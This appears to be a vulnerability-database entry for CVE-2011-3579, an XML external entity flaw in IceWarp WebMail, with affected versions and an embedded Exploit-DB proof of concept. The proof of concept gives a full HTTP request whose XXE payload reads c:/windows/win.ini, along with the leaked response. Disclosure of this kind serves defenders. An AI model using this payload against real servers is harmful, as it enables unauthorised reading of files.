CVE-2011-3579

medium

Published 2011-09-30 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

7.4

Description

server/webmail.php in IceWarp WebMail in IceWarp Mail Server before 10.3.3 allows remote attackers to read arbitrary files, and possibly send HTTP requests to intranet servers or cause a denial of service (CPU and memory consumption), via an XML external entity declaration in conjunction with an entity reference.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-36165 webapps php verified text · 2 KB

David Kirkpatrick · 2011-09-24

IceWarp Mail Server 10.3.2 server/webmail.php Soap Message Parsing - Arbitrary File Disclosure

text exploit Source: Exploit-DB

source: https://www.securityfocus.com/bid/49753/info

IceWarp Web Mail is prone to multiple information-disclosure vulnerabilities.

Attackers can exploit these issues to gain access to potentially sensitive information, and possibly cause denial-of-service conditions; other attacks may also be possible. 

Proof-of-Concept:

The following POST request was sent to the host A.B.C.D where the IceWarp mail
server was running:

REQUEST 
========= 
POST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1 
Host:A.B.C.D 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
Firefox/5.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language:en-gb,en;q=0.5i've 
Accept-Encoding: gzip, deflate 
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 
Proxy-Connection: keep-alive 
Referer: http://A.B.C.D 
Content-Length: 249 
Content-Type: application/xml; 
charset=UTF-8
Pragma: no-cache 
Cache-Control: no-cache

<!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM "file:///c:/windows/win.ini"> ]><iq
type="set"><query xmlns="webmail:iq:auth"><username>test&xxeb91c4;</username><digest>828cd27c6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffcd2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method></query></iq>

RESPONSE: 
========== 
HTTP/1.1 200 OK 
Server: IceWarp/9.4.2 
Date: Wed, 20 Jul
2011 10:04:56 GMT 
Expires: Thu, 19 Nov 1981 08:52:00 GMT 
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0 
Pragma: no-cache
Content-Type: text/xml 
Vary: Accept-Encoding 
Content-Length: 1113

<?xml version="1.0" encoding="utf-8"?><iq type="error"><error
uid="login_invalid">test; for 16-bit app support 
[fonts] 
[extensions] 
[mci extensions] 
[files] 
[Mail] 
MAPI=1
....TRUNCATED

Application impact

Vendor	Product	Versions
icewarp	mail_server	`{"endIncluding":"10.3.2"}`
icewarp	mail_server	`9.3.0`
icewarp	mail_server	`9.3.1`
icewarp	mail_server	`9.3.2`
icewarp	mail_server	`9.4.0`
icewarp	mail_server	`9.4.1`
icewarp	mail_server	`9.4.2`
icewarp	mail_server	`10.0.3`
icewarp	mail_server	`10.0.4`
icewarp	mail_server	`10.0.7`
icewarp	mail_server	`10.0.8`
icewarp	mail_server	`10.1.1`
icewarp	mail_server	`10.1.2`
icewarp	mail_server	`10.1.3`
icewarp	mail_server	`10.1.4`
icewarp	mail_server	`10.2.0`
icewarp	mail_server	`10.2.1`
icewarp	mail_server	`10.2.2`
icewarp	mail_server	`10.3.0`
icewarp	mail_server	`10.3.1`

References

CWEs

CWE-399

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.